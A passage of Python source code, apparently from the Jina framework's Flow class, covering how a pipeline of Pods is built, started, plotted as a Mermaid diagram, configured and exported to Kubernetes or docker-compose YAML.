) -> 'Flow':
"""Gather all inspect Pods output into one Pod. When the Flow has no inspect Pod then the Flow itself
is returned.
.. note::
If ``--no-inspect`` is **not** given, then :meth:`gather_inspect` is auto called before :meth:`build`. So
in general you don't need to manually call :meth:`gather_inspect`.
:param name: the name of the gather Pod
:param include_last_pod: if to include the last modified Pod in the Flow
:param args: args for .add()
:param kwargs: kwargs for .add()
:return: the modified Flow or the copy of it
.. seealso::
:meth:`inspect`
"""
needs = [k for k, v in self._pod_nodes.items() if v.role == PodRoleType.INSPECT]
if needs:
if include_last_pod:
needs.append(self.last_pod)
return self.add(
name=name,
needs=needs,
pod_role=PodRoleType.JOIN_INSPECT,
*args,
**kwargs,
)
else:
# no inspect node is in the graph, return the current graph
return self
def _get_gateway_target(self, prefix):
gateway_pod = self._pod_nodes[GATEWAY_NAME]
return (
f'{prefix}-{GATEWAY_NAME}',
{
'host': gateway_pod.head_host,
'port': gateway_pod.head_port_in,
'expected_parts': 0,
},
)
@allowed_levels([FlowBuildLevel.EMPTY])
def build(self, copy_flow: bool = False) -> 'Flow':
"""
Build the current Flow and make it ready to use
.. note::
No need to manually call it since 0.0.8. When using Flow with the
context manager, or using :meth:`start`, :meth:`build` will be invoked.
:param copy_flow: when set to true, then always copy the current Flow and do the modification on top of it then return, otherwise, do in-line modification
:return: the current Flow (by default)
.. note::
``copy_flow=True`` is recommended if you are building the same Flow multiple times in a row. e.g.
.. highlight:: python
.. code-block:: python
f = Flow()
with f:
f.index()
with f.build(copy_flow=True) as fl:
fl.search()
.. # noqa: DAR401
"""
op_flow = copy.deepcopy(self) if copy_flow else self
if op_flow.args.inspect == FlowInspectType.COLLECT:
op_flow.gather_inspect(copy_flow=False)
if GATEWAY_NAME not in op_flow._pod_nodes:
op_flow._add_gateway(
needs={op_flow.last_pod},
graph_description=op_flow._get_graph_representation(),
pod_addresses=op_flow._get_pod_addresses(),
)
removed_pods = []
# if set no_inspect then all inspect related nodes are removed
if op_flow.args.inspect == FlowInspectType.REMOVE:
filtered_pod_nodes = OrderedDict()
for k, v in op_flow._pod_nodes.items():
if not v.role.is_inspect:
filtered_pod_nodes[k] = v
else:
removed_pods.append(v.name)
op_flow._pod_nodes = filtered_pod_nodes
reverse_inspect_map = {v: k for k, v in op_flow._inspect_pods.items()}
while (
len(op_flow._last_changed_pod) > 0
and len(removed_pods) > 0
and op_flow.last_pod in removed_pods
):
op_flow._last_changed_pod.pop()
for end, pod in op_flow._pod_nodes.items():
# if an endpoint is being inspected, then replace it with inspected Pod
# but not those inspect related node
if op_flow.args.inspect.is_keep:
pod.needs = set(
ep if pod.role.is_inspect else op_flow._inspect_pods.get(ep, ep)
for ep in pod.needs
)
else:
pod.needs = set(reverse_inspect_map.get(ep, ep) for ep in pod.needs)
hanging_pods = _hanging_pods(op_flow)
if hanging_pods:
op_flow.logger.warning(
f'{hanging_pods} are hanging in this flow with no pod receiving from them, '
f'you may want to double check if it is intentional or some mistake'
)
op_flow._build_level = FlowBuildLevel.GRAPH
if len(removed_pods) > 0:
# very dirty
op_flow._pod_nodes[GATEWAY_NAME].args.graph_description = json.dumps(
op_flow._get_graph_representation()
)
op_flow._pod_nodes[GATEWAY_NAME].args.pod_addresses = json.dumps(
op_flow._get_pod_addresses()
)
op_flow._pod_nodes[GATEWAY_NAME].update_pea_args()
return op_flow
def __call__(self, *args, **kwargs):
"""Builds the Flow
:param args: args for build
:param kwargs: kwargs for build
:return: the built Flow
"""
return self.build(*args, **kwargs)
def __enter__(self):
with CatchAllCleanupContextManager(self):
return self.start()
def __exit__(self, exc_type, exc_val, exc_tb):
if hasattr(self, '_stop_event'):
self._stop_event.set()
super().__exit__(exc_type, exc_val, exc_tb)
# unset all envs to avoid any side-effect
if self.args.env:
for k in self.args.env.keys():
os.environ.pop(k, None)
# do not know why but removing these 2 lines make 2 tests fail
if GATEWAY_NAME in self._pod_nodes:
self._pod_nodes.pop(GATEWAY_NAME)
self._build_level = FlowBuildLevel.EMPTY
self.logger.debug('Flow is closed!')
self.logger.close()
def start(self):
"""Start to run all Pods in this Flow.
Remember to close the Flow with :meth:`close`.
Note that this method has a timeout of ``timeout_ready`` set in CLI,
which is inherited all the way from :class:`jina.peapods.peas.Pea`
.. # noqa: DAR401
:return: this instance
"""
if self._build_level.value < FlowBuildLevel.GRAPH.value:
self.build(copy_flow=False)
# set env only before the Pod get started
if self.args.env:
for k, v in self.args.env.items():
os.environ[k] = str(v)
for k, v in self:
if not v.external:
self.enter_context(v)
self._wait_until_all_ready()
self._build_level = FlowBuildLevel.RUNNING
return self
def _wait_until_all_ready(self):
results = {}
threads = []
def _wait_ready(_pod_name, _pod):
try:
if not _pod.external:
results[_pod_name] = 'pending'
_pod.wait_start_success()
results[_pod_name] = 'done'
except Exception as ex:
results[_pod_name] = repr(ex)
def _polling_status():
spinner = itertools.cycle(
['⠋', '⠙', '⠹', '⠸', '⠼', '⠴', '⠦', '⠧', '⠇', '⠏']
)
while True:
num_all = len(results)
num_done = 0
pendings = []
for _k, _v in results.items():
sys.stdout.flush()
if _v == 'pending':
pendings.append(_k)
else:
num_done += 1
sys.stdout.write('\r{}\r'.format(' ' * 100))
pending_str = colored(' '.join(pendings)[:50], 'yellow')
sys.stdout.write(
f'{colored(next(spinner), "green")} {num_done}/{num_all} waiting {pending_str} to be ready...'
)
sys.stdout.flush()
if not pendings:
sys.stdout.write('\r{}\r'.format(' ' * 100))
break
time.sleep(0.1)
# kick off all pods wait-ready threads
for k, v in self:
t = threading.Thread(
target=_wait_ready,
args=(
k,
v,
),
daemon=True,
)
threads.append(t)
t.start()
# kick off spinner thread
t_m = threading.Thread(target=_polling_status, daemon=True)
t_m.start()
# kick off ip getter thread
addr_table = []
t_ip = threading.Thread(
target=self._get_address_table, args=(addr_table,), daemon=True
)
t_ip.start()
for t in threads:
t.join()
if t_ip is not None:
t_ip.join()
t_m.join()
error_pods = [k for k, v in results.items() if v != 'done']
if error_pods:
self.logger.error(
f'Flow is aborted due to {error_pods} can not be started.'
)
self.close()
raise RuntimeFailToStart
else:
success_msg = colored('🎉 Flow is ready to use!', 'green')
if addr_table:
self.logger.info(success_msg + '\n' + '\n'.join(addr_table))
self.logger.debug(
f'{self.num_pods} Pods (i.e. {self.num_peas} Peas) are running in this Flow'
)
@property
def num_pods(self) -> int:
"""Get the number of Pods in this Flow
.. # noqa: DAR201"""
return len(self._pod_nodes)
@property
def num_peas(self) -> int:
"""Get the number of peas (shards count) in this Flow
.. # noqa: DAR201"""
return sum(v.num_peas for v in self._pod_nodes.values())
def __eq__(self, other: 'Flow') -> bool:
"""
Compare the topology of a Flow with another Flow.
Identification is defined by whether two flows share the same set of edges.
:param other: the second Flow object
:return: result of equality check
"""
if self._build_level.value < FlowBuildLevel.GRAPH.value:
op_flow = copy.deepcopy(self)
a = op_flow.build()
else:
a = self
if other._build_level.value < FlowBuildLevel.GRAPH.value:
op_flow_b = copy.deepcopy(other)
b = op_flow_b.build()
else:
b = other
return a._pod_nodes == b._pod_nodes
@property
def client(self) -> 'BaseClient':
"""Return a :class:`BaseClient` object attach to this Flow.
.. # noqa: DAR201"""
kwargs = dict(
host=self.host,
port=self.port_expose,
protocol=self.protocol,
results_as_docarray=True,
)
kwargs.update(self._common_kwargs)
return Client(**kwargs)
@property
def _mermaid_str(self):
mermaid_graph = [
'''
%%{init:{
"theme": "base",
"themeVariables": {
"primaryColor": "#fff",
"primaryBorderColor": "#fff",
"mainBkg": "#32C8CD",
"clusterBkg": "#EEEDE78C",
"secondaryBorderColor": "none",
"tertiaryBorderColor": "none",
"lineColor": "#a6d8da"
}
}}%%
'''.replace(
'\n', ''
),
'flowchart LR;',
]
pod_nodes = []
# plot subgraphs
for node, v in self._pod_nodes.items():
pod_nodes.append(v.name)
mermaid_graph.extend(v._mermaid_str)
for node, v in self._pod_nodes.items():
for need in sorted(v.needs):
need_print = need
if need == 'gateway':
need_print = 'gatewaystart[gateway]'
node_print = node
if node == 'gateway':
node_print = 'gatewayend[gateway]'
_s_role = self._pod_nodes[need].role
_e_role = self._pod_nodes[node].role
if self._pod_nodes[need].external:
_s_role = 'EXTERNAL'
if self._pod_nodes[node].external:
_e_role = 'EXTERNAL'
line_st = '-->'
if _s_role == PodRoleType.INSPECT or _e_role == PodRoleType.INSPECT:
line_st = '-.->'
mermaid_graph.append(
f'{need_print}:::{str(_s_role)} {line_st} {node_print}:::{str(_e_role)};'
)
mermaid_graph.append(f'classDef {str(PodRoleType.INSPECT)} stroke:#F29C9F')
mermaid_graph.append(f'classDef {str(PodRoleType.JOIN_INSPECT)} stroke:#F29C9F')
mermaid_graph.append(
f'classDef {str(PodRoleType.GATEWAY)} fill:none,color:#000,stroke:none'
)
mermaid_graph.append(
f'classDef {str(PodRoleType.INSPECT_AUX_PASS)} stroke-dasharray: 2 2'
)
mermaid_graph.append(f'classDef HEADTAIL fill:#32C8CD1D')
mermaid_graph.append(f'\nclassDef EXTERNAL fill:#fff,stroke:#32C8CD')
return '\n'.join(mermaid_graph)
def plot(
self,
output: Optional[str] = None,
vertical_layout: bool = False,
inline_display: bool = False,
build: bool = True,
copy_flow: bool = True,
) -> 'Flow':
"""
Visualize the Flow up to the current point
If a file name is provided it will create a jpg image with that name,
otherwise it will display the URL for mermaid.
If called within IPython notebook, it will be rendered inline,
otherwise an image will be created.
Example,
.. highlight:: python
.. code-block:: python
flow = Flow().add(name='pod_a').plot('flow.svg')
:param output: a filename specifying the name of the image to be created,
the suffix svg/jpg determines the file type of the output image
:param vertical_layout: top-down or left-right layout
:param inline_display: show image directly inside the Jupyter Notebook
:param build: build the Flow first before plotting, gateway connection can be better showed
:param copy_flow: when set to true, then always copy the current Flow and
do the modification on top of it then return, otherwise, do in-line modification
:return: the Flow
"""
# deepcopy causes the below error while reusing a Flow in Jupyter
# 'Pickling an AuthenticationString object is disallowed for security reasons'
op_flow = copy.deepcopy(self) if copy_flow else self
if build:
op_flow.build(False)
mermaid_str = op_flow._mermaid_str
if vertical_layout:
mermaid_str = mermaid_str.replace('flowchart LR', 'flowchart TD')
image_type = 'svg'
if output and not output.endswith('svg'):
image_type = 'img'
url = op_flow._mermaid_to_url(mermaid_str, image_type)
showed = False
if inline_display:
try:
from IPython.display import display, Image
display(Image(url=url))
showed = True
except:
# no need to panic users
pass
if output:
download_mermaid_url(url, output)
elif not showed:
op_flow.logger.info(f'flow visualization: {url}')
return self
def _ipython_display_(self):
"""Displays the object in IPython as a side effect"""
self.plot(
inline_display=True, build=(self._build_level != FlowBuildLevel.GRAPH)
)
def _mermaid_to_url(self, mermaid_str: str, img_type: str) -> str:
"""
Render the current Flow as URL points to a SVG. It needs internet connection
:param mermaid_str: the mermaid representation
:param img_type: image type (svg/jpg)
:return: the url points to a SVG
"""
encoded_str = base64.b64encode(bytes(mermaid_str, 'utf-8')).decode('utf-8')
return f'https://mermaid.ink/{img_type}/{encoded_str}'
@property
def port_expose(self) -> int:
"""Return the exposed port of the gateway
.. # noqa: DAR201
"""
if GATEWAY_NAME in self._pod_nodes:
return self._pod_nodes[GATEWAY_NAME].args.port_expose
else:
return self._common_kwargs.get('port_expose', None)
@port_expose.setter
def port_expose(self, value: int):
"""Set the new exposed port of the Flow (affects Gateway and Client)
:param value: the new port to expose
"""
self._common_kwargs['port_expose'] = value
# Flow is build to graph already
if self._build_level >= FlowBuildLevel.GRAPH:
self[GATEWAY_NAME].args.port_expose = self._common_kwargs['port_expose']
# Flow is running already, then close the existing gateway
if self._build_level >= FlowBuildLevel.RUNNING:
self[GATEWAY_NAME].close()
self.enter_context(self[GATEWAY_NAME])
self[GATEWAY_NAME].wait_start_success()
@property
def host(self) -> str:
"""Return the local address of the gateway
.. # noqa: DAR201
"""
if GATEWAY_NAME in self._pod_nodes:
return self._pod_nodes[GATEWAY_NAME].host
else:
return self._common_kwargs.get('host', __default_host__)
@host.setter
def host(self, value: str):
"""Set the new host of the Flow (affects Gateway and Client)
:param value: the new port to expose
"""
self._common_kwargs['host'] = value
# Flow is build to graph already
if self._build_level >= FlowBuildLevel.GRAPH:
self[GATEWAY_NAME].args.host = self._common_kwargs['host']
# Flow is running already, then close the existing gateway
if self._build_level >= FlowBuildLevel.RUNNING:
self[GATEWAY_NAME].close()
self.enter_context(self[GATEWAY_NAME])
self[GATEWAY_NAME].wait_start_success()
@property
def address_private(self) -> str:
"""Return the private IP address of the gateway for connecting from other machine in the same network
.. # noqa: DAR201"""
return get_internal_ip()
@property
def address_public(self) -> str:
"""Return the public IP address of the gateway for connecting from other machine in the public network
.. # noqa: DAR201"""
return get_public_ip()
def __iter__(self):
return self._pod_nodes.items().__iter__()
def _get_address_table(self, address_table):
address_table.extend(
[
f'\t🔗 Protocol: \t\t{colored(self.protocol, attrs="bold")}',
f'\t🏠 Local access:\t'
+ colored(f'{self.host}:{self.port_expose}', 'cyan', attrs='underline'),
f'\t🔒 Private network:\t'
+ colored(
f'{self.address_private}:{self.port_expose}',
'cyan',
attrs='underline',
),
]
)
if self.address_public:
address_table.append(
f'\t🌐 Public address:\t'
+ colored(
f'{self.address_public}:{self.port_expose}',
'cyan',
attrs='underline',
)
)
if self.protocol == GatewayProtocolType.HTTP:
address_table.append(
f'\t💬 Swagger UI:\t\t'
+ colored(
f'http://localhost:{self.port_expose}/docs',
'cyan',
attrs='underline',
)
)
address_table.append(
f'\t📚 Redoc:\t\t'
+ colored(
f'http://localhost:{self.port_expose}/redoc',
'cyan',
attrs='underline',
)
)
return address_table
def block(
self, stop_event: Optional[Union[threading.Event, multiprocessing.Event]] = None
):
"""Block the Flow until `stop_event` is set or user hits KeyboardInterrupt
:param stop_event: a threading event or a multiprocessing event that onces set will resume the control Flow
to main thread.
"""
try:
if stop_event is None:
self._stop_event = (
threading.Event()
) #: this allows `.close` to close the Flow from another thread/proc
self._stop_event.wait()
else:
stop_event.wait()
except KeyboardInterrupt:
pass
@property
def protocol(self) -> GatewayProtocolType:
"""Return the protocol of this Flow
:return: the protocol of this Flow
"""
v = self._common_kwargs.get('protocol', GatewayProtocolType.GRPC)
if isinstance(v, str):
v = GatewayProtocolType.from_string(v)
return v
@protocol.setter
def protocol(self, value: Union[str, GatewayProtocolType]):
"""Set the protocol of this Flow, can only be set before the Flow has been started
:param value: the protocol to set
"""
# Flow is running already, protocol cant be changed anymore
if self._build_level >= FlowBuildLevel.RUNNING:
raise RuntimeError('Protocol can not be changed after the Flow has started')
if isinstance(value, str):
self._common_kwargs['protocol'] = GatewayProtocolType.from_string(value)
elif isinstance(value, GatewayProtocolType):
self._common_kwargs['protocol'] = value
else:
raise TypeError(f'{value} must be either `str` or `GatewayProtocolType`')
# Flow is build to graph already
if self._build_level >= FlowBuildLevel.GRAPH:
self[GATEWAY_NAME].args.protocol = self._common_kwargs['protocol']
def __getitem__(self, item):
if isinstance(item, str):
return self._pod_nodes[item]
elif isinstance(item, int):
return list(self._pod_nodes.values())[item]
else:
raise TypeError(f'{typename(item)} is not supported')
@property
def workspace(self) -> str:
"""Return the workspace path of the flow.
.. # noqa: DAR201"""
return os.path.abspath(self.args.workspace or './')
@workspace.setter
def workspace(self, value: str):
"""set workspace dir for flow & all pods
:param value: workspace to be set
"""
self.args.workspace = value
for k, p in self:
p.args.workspace = value
p.update_pea_args()
@property
def workspace_id(self) -> Dict[str, str]:
"""Get all Pods' ``workspace_id`` values in a dict
.. # noqa: DAR201"""
return {
k: p.args.workspace_id for k, p in self if hasattr(p.args, 'workspace_id')
}
@workspace_id.setter
def workspace_id(self, value: str):
"""Set all Pods' ``workspace_id`` to ``value``
:param value: a hexadecimal UUID string
"""
uuid.UUID(value)
for k, p in self:
if hasattr(p.args, 'workspace_id'):
p.args.workspace_id = value
args = getattr(p, 'peas_args', getattr(p, 'shards_args', None))
if args is None:
raise ValueError(
f'could not find "peas_args" or "shards_args" on {p}'
)
values = None
if isinstance(args, dict):
values = args.values()
elif isinstance(args, list):
values = args
for v in values:
if v and isinstance(v, argparse.Namespace):
v.workspace_id = value
if v and isinstance(v, List):
for i in v:
i.workspace_id = value
@property
def env(self) -> Optional[Dict]:
"""Get all envs to be set in the Flow
:return: envs as dict
"""
return self.args.env
@env.setter
def env(self, value: Dict[str, str]):
"""set env vars for flow & all pods.
This can be used by jinad to set envs for Flow and all child objects
:param value: value to be set
"""
self.args.env = value
for k, v in self:
v.args.env = value
@overload
def expose_endpoint(self, exec_endpoint: str, path: Optional[str] = None):
"""Expose an Executor's endpoint (defined by `@requests(on=...)`) to HTTP endpoint for easier access.
After expose, you can send data request directly to `http://hostname:port/endpoint`.
:param exec_endpoint: the endpoint string, by convention starts with `/`
:param path: the HTTP endpoint string, when not given, it is `exec_endpoint`
"""
...
@overload
def expose_endpoint(
self,
exec_endpoint: str,
*,
path: Optional[str] = None,
status_code: int = 200,
tags: Optional[List[str]] = None,
summary: Optional[str] = None,
description: Optional[str] = None,
response_description: str = 'Successful Response',
deprecated: Optional[bool] = None,
methods: Optional[List[str]] = None,
operation_id: Optional[str] = None,
response_model_by_alias: bool = True,
response_model_exclude_unset: bool = False,
response_model_exclude_defaults: bool = False,
response_model_exclude_none: bool = False,
include_in_schema: bool = True,
name: Optional[str] = None,
):
"""Expose an Executor's endpoint (defined by `@requests(on=...)`) to HTTP endpoint for easier access.
After expose, you can send data request directly to `http://hostname:port/endpoint`.
Use this method to specify your HTTP endpoint with richer semantic and schema.
:param exec_endpoint: the endpoint string, by convention starts with `/`
# noqa: DAR101
"""
...
def expose_endpoint(self, exec_endpoint: str, **kwargs):
"""Expose an Executor's endpoint (defined by `@requests(on=...)`) to HTTP endpoint for easier access.
After expose, you can send data request directly to `http://hostname:port/endpoint`.
:param exec_endpoint: the endpoint string, by convention starts with `/`
# noqa: DAR101
# noqa: DAR102
"""
self._endpoints_mapping[exec_endpoint] = kwargs
# for backward support
join = needs
def rolling_update(
self,
pod_name: str,
uses_with: Optional[Dict] = None,
):
"""
Reload all replicas of a pod sequentially
:param pod_name: pod to update
:param uses_with: a Dictionary of arguments to restart the executor with
"""
from jina.helper import run_async
run_async(
self._pod_nodes[pod_name].rolling_update,
uses_with=uses_with,
any_event_loop=True,
)
def to_k8s_yaml(
self,
output_base_path: str,
k8s_namespace: Optional[str] = None,
k8s_connection_pool: bool = True,
):
"""
Converts the Flow into a set of yaml deployments to deploy in Kubernetes
:param output_base_path: The base path where to dump all the yaml files
:param k8s_namespace: The name of the k8s namespace to set for the configurations. If None, the name of the Flow will be used.
:param k8s_connection_pool: Boolean indicating wether the kubernetes connection pool should be used inside the Executor Runtimes.
"""
import yaml
if self._build_level.value < FlowBuildLevel.GRAPH.value:
self.build(copy_flow=False)
from jina.orchestrate.pods.config.k8s import K8sPodConfig
k8s_namespace = k8s_namespace or self.args.name or 'default'
for node, v in self._pod_nodes.items():
pod_base = os.path.join(output_base_path, node)
k8s_pod = K8sPodConfig(
args=v.args,
k8s_namespace=k8s_namespace,
k8s_connection_pool=k8s_connection_pool,
k8s_pod_addresses=self._get_k8s_pod_addresses(k8s_namespace)
if (node == 'gateway' and not k8s_connection_pool)
else None,
)
configs = k8s_pod.to_k8s_yaml()
for name, k8s_objects in configs:
filename = os.path.join(pod_base, f'{name}.yml')
os.makedirs(pod_base, exist_ok=True)
with open(filename, 'w+') as fp:
for i, k8s_object in enumerate(k8s_objects):
yaml.dump(k8s_object, fp)
if i < len(k8s_objects) - 1:
fp.write('---\n')
def to_docker_compose_yaml(
self, output_path: Optional[str] = None, network_name: Optional[str] = None
):
"""
Converts the Flow into a yaml file to run with `docker-compose up`
:param output_path: The output path for the yaml file
:param network_name: The name of the network that will be used by the deployment name
"""
import yaml
if self._build_level.value < FlowBuildLevel.GRAPH.value:
self.build(copy_flow=False)
output_path = output_path or 'docker-compose.yml'
network_name = network_name or 'jina-network'
from jina.orchestrate.pods.config.docker_compose import DockerComposeConfig
docker_compose_dict = {
'version': '3.3',
'networks': {network_name: {'driver': 'bridge'}},
}
services = {}
for node, v in self._pod_nodes.items():
docker_compose_pod = DockerComposeConfig(
args=v.args,
pod_addresses=self._get_docker_compose_pod_addresses(),
)
service_configs = docker_compose_pod.to_docker_compose_config()
for service_name, service in service_configs:
service['networks'] = [network_name]
services[service_name] = service
docker_compose_dict['services'] = services
with open(output_path, 'w+') as fp:
yaml.dump(docker_compose_dict, fp, sort_keys=False)
def scale(
self,
pod_name: str,
replicas: int,
):
"""
Scale the amount of replicas of a given Executor.
:param pod_name: pod to update
:param replicas: The number of replicas to scale to
"""
# TODO when replicas-host is ready, needs to be passed here
from jina.helper import run_async
run_async(
self._pod_nodes[pod_name].scale,
replicas=replicas,
any_event_loop=True,
)
@property
def client_args(self) -> argparse.Namespace:
"""Get Client settings.
# noqa: DAR201
"""
if 'port_expose' in self._common_kwargs:
kwargs = copy.deepcopy(self._common_kwargs)
kwargs['port'] = self._common_kwargs['port_expose']
return ArgNamespace.kwargs2namespace(kwargs, set_client_cli_parser())
@property
def gateway_args(self) -> argparse.Namespace:
"""Get Gateway settings.
# noqa: DAR201
"""
return ArgNamespace.kwargs2namespace(self._common_kwargs, set_gateway_parser())
def update_network_interface(self, **kwargs):
"""Update the network interface of this Flow (affects Gateway & Client)
:param kwargs: new network settings
"""
self._common_kwargs.update(kwargs)
|
Subsets and Splits
No community queries yet
The top public SQL queries from the community will appear here once available.